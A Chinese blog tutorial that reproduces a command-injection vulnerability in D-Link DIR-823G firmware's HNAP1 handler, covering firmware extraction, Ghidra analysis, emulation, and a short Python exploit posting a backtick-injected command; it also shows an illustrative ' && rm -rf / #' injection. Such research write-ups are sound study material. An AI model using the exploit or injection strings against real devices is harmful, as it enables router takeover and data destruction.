前言
D-Link DIR-823G v1.02 B05存在命令注入漏洞,攻击者可以通过POST的方式往 /HNAP1发送精心构造的请求,执行恣意的操纵系统命令。
漏洞分析
[img=720,331.74946004319656]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627654.png[/img]
binwalk提取固件,成功获取到固件。
[img=720,71.90283400809717]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627223.png[/img]
[img=720,108.87417218543047]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627189.png[/img]
现在我们已经进入到应用里了,那么我们在进行分析固件的时候,应该怎么去分析这个环境?起首,我们去分析别人的漏洞,别人是会告诉哪里会出现题目。但是我们现在假设我们是分析一个未知固件,我们就得先知道这个固件有哪些应用,启动了哪些服务,最清晰和简便的方式就是去看我们etc文件下面,内里有个叫init.d的目录,内里是关于启动项的内容。
[img=720,142.08]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627502.png[/img]
我们起首来看rcS下面的内容 vim rcS
起首是设置ip,然后挂载了两个文件系统分别是proc,这是与进程相关的文件系统,包括当前进程启动存放在哪个地址。
尚有ramfs文件系统,根据以前的笔记,可知ramfs文件系统跟RAM相关。
【----资助网安学习,以下全部学习资料免费领!加vx:yj520400,备注 “博客园” 获取!】
① 网安学习发展路径头脑导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)
然后下面就是判断是否尚有挂载别的文件系统。
然后mkdir就是创建各种各样的文件夹,都有对应的功能,比如说创建了pptp文件夹,针对拨号上网的功能,然后尚有smbd服务,可以看到创建了一个usb的文件夹,说明该固件有可以跟usb也就是U盘相关的操纵,接下来都是一些设置信息。
[img=720,499.54397394136805]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627508.png[/img]
继续往下翻
可以看到该固件启动了web server的web服务,也就是httpd的内容,这里启动的是goahead,通过这个名字,我们可以确定web服务就是goahead,假如想要分析web服务的话,就直接分析goahead就可以。
[img=720,368.48722986247543]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627492.png[/img]
我们回到squashfs-root目录下,搜索goahead的一些简朴环境[img=720,143.37436640115857]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627772.png[/img]
最下面是两个启动项的内容,可以忽略,然后第一行是bin的可执行应用,这个着实就是我们最后分析的内容。
那如何分析呢?它是一个HNAP1请求,那就可以去检索我们的HANP1请求[img=720,256.7]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627343.png[/img]
可以看到它检索到一些js代码,js代码对我们来说一样平常,(比较我们是找二进制相关的漏洞)
但是,我们可以发现它匹配了一个二进制程序,也就是goahead。
这里我们先科普一下goahead的一些环境:
GoAhead ,它是一个源码,免费、功能强大、可以在多个平台运行的嵌入式WebServer。
goahead的websUrlHandlerDefine函数答应用户自界说不同url的处理函数。
它在进行编写与它相关的请求,是通过websUrlHandlerDefine来确定的。- websUrlHandlerDefine(T("/HNAP1"),NULL,0, websHNAPHandler,0);
- websUrlHandlerDefine(T("/goform"),NULL,0, websFormHandler,0);
- websUrlHandlerDefine(T("/cgi.bin"),NULL,0, websCgiHandler,0);
复制代码 使用ghidra进行逆向分析,goahead二进制文件在squashfs-root目录下的bin目录下
[img=720,422.09606986899564]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627266.png[/img]
那进入到goahead反编译界面该如何分析呢?一种是找到main函数去进行分析,比较耗时
一种是通过关键字来搜索,反推调用环境,来推测每个功能的解析环境 ctrl+shift+E
匹配成功,停在指定区域
[img=720,253.17073170731706]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627420.png[/img]
但是它所对应的反编译代码还是很多的,所以我们可以通过反编译出来的函数名,进行查看它的调用关系。
[img=720,412.994923857868]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627726.png[/img]
一起往下翻,终于找到我们所要的东西
[img=720,360.46814044213266]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628708.png[/img]
而且我们看到,这个函数继续往上调的话就是main函数了,所以着实一开始也是可以从main函数来分析的(0.0)
所以现在我们可以重点来分析这个函数
[img=720,581.1251435132032]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628759.png[/img]
前面还是做一些判断,然后请求尚有不止HNAP1,对应的都是一个函数。
同一个函数做的事情,类似于websUrlHandlerDefine这个函数,那HANP1对应的函数是
FUN_0042383c,那就双击进去看看
这里就是漏洞点,这里执行了memset和snprintf,一样平常来说这里应该是不存在漏洞点,但是下面一条语句是system,也就是把格式化化的字符串直接就拿到了system函数作为参数转达进去,而snprintf这里的参数有个echo,有个单引号题目。
比如说正常代码- #!/bin/bash
- read -p "Enter your name: " name
- echo 'Hello, '$name'!'
复制代码 攻击步调:
正常输入:用户输入 Alice,输出:恶意输入:用户输入 '$(id)',此时脚本实际执行的命令变为:输出:单引号内的 $(id) 不会被执行,暂时安全。
更伤害的输入:用户输入 ' && rm -rf / #,命令变为:- echo 'Hello, '' && rm -rf / #'!
复制代码 此时,第一个单引号被用户输入的 ' 闭合。&& rm -rf / 成为独立命令,在 echo 之后执行。# 注释掉后续的 '!,避免语法错误。
那么会导致rm -rf / 会被执行,删除系统文件!
所以,假如我们构造一些恶意的代码写入到snprintf中,再转达到system函数,就会造成命令注入漏洞。
但是我们要进到漏洞点的话,还需要满足函数上面的一些要求。
所以我们得符合上面函数的一些限制才能进入到漏洞点来,这里先取了PTR_s_SetMultipleActions_00588d80的首地址,赋值给DAT_0058a6c4,然后DAT_0058a6c4自身判断和自加2来进行循环判断,用strstr函数查找DAT_0058a6c4在param_+0x524中出现的位置,并赋值给pcVar1,假如pcVar1的值不为0的话,就会进入到我们的漏洞点来。
DAT_0058a6c4与PTR_s_SetMultipleActions_00588d80相关,双击进去看看
[img=720,457.9378881987578]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628065.png[/img]
可以看到内里都是它对应的一些方法,比如说SetMultipleActions之类的。
固件模仿
分析到这里,基本上是明朗了,接下来就要进行固件模仿操纵,使用firmadyne模仿固件启动。
[img=720,210.6474820143885]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628351.png[/img] - sudo ./DIR823G_V1.0.2B05_20181207.sh
复制代码 然后firmadyne默认的暗码就是firmadyne
[img=720,504.35064935064935]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628624.png[/img]
得等一段时间,然后192.168.0.1
但是这个一直搞不定,模仿不起来,也不知道是什么缘故原由,排查不出。
然后换成了firmware analysis plus (fap)这个框架,就模仿起来了
[img=720,300.76561450638013]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628702.png[/img]
等一段时间后,回车,就可以模仿起来了,输入192.168.0.1
[img=720,415.5246523388116]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628002.png[/img]
进入向导,随便输入点东西
[img=720,483.5820895522388]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628608.png[/img]
[img=720,508.6342229199372]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628104.png[/img]
暗码8位,输入12345678
[img=720,481.4035087719298]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628170.png[/img]
然后就开始设置一些内容,同时可以注意到左侧已经把一些数据写入到关键的文件夹中
[img=720,354.92957746478874]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628775.png[/img]
设置完毕,登录,成功进入路由器
[img=720,391.0025706940874]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628957.png[/img]
exp编写
- #!/usr/bin/env python
- #-*- coding:utf-8 -*-
-
- import requests
-
- ip='192.168.0.1'
-
- command="'`echo aaaaaaaaa > /web_mtn/test.txt`'"
- length=len(command)
-
- headers=requests.utils.default_headers()
- headers["Content-Length"]=str(length)
- headers["User-Agent"]="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36"
- headers["SOAPAction"]='"http://purenetworks.com/HNAP1/GetClientInfo"'
- headers["Content-Type"]="text/xml; charset=UTF-8"
- headers["Accept"]="*/*"
- headers["Accept-Encoding"]="gzip, deflate"
- headers["Accept-Language"]="zh-CN,zh;q=0.9,en;q=0.8"
-
- payload=command
- r=requests.post('http://'+ip+'/HNAP1/', headers=headers, data=payload)
复制代码 因为是http请求,所以我们使用requests,然后设置ip,设置命令,构造报头,最后post请求将HNAP1,headers和payload都传过去。
[img=720,65.7]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628439.png[/img]
复现完毕,ctrl+a 然后x结束固件模仿。
更多网安技能的在线实操练习,请点击这里>>
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |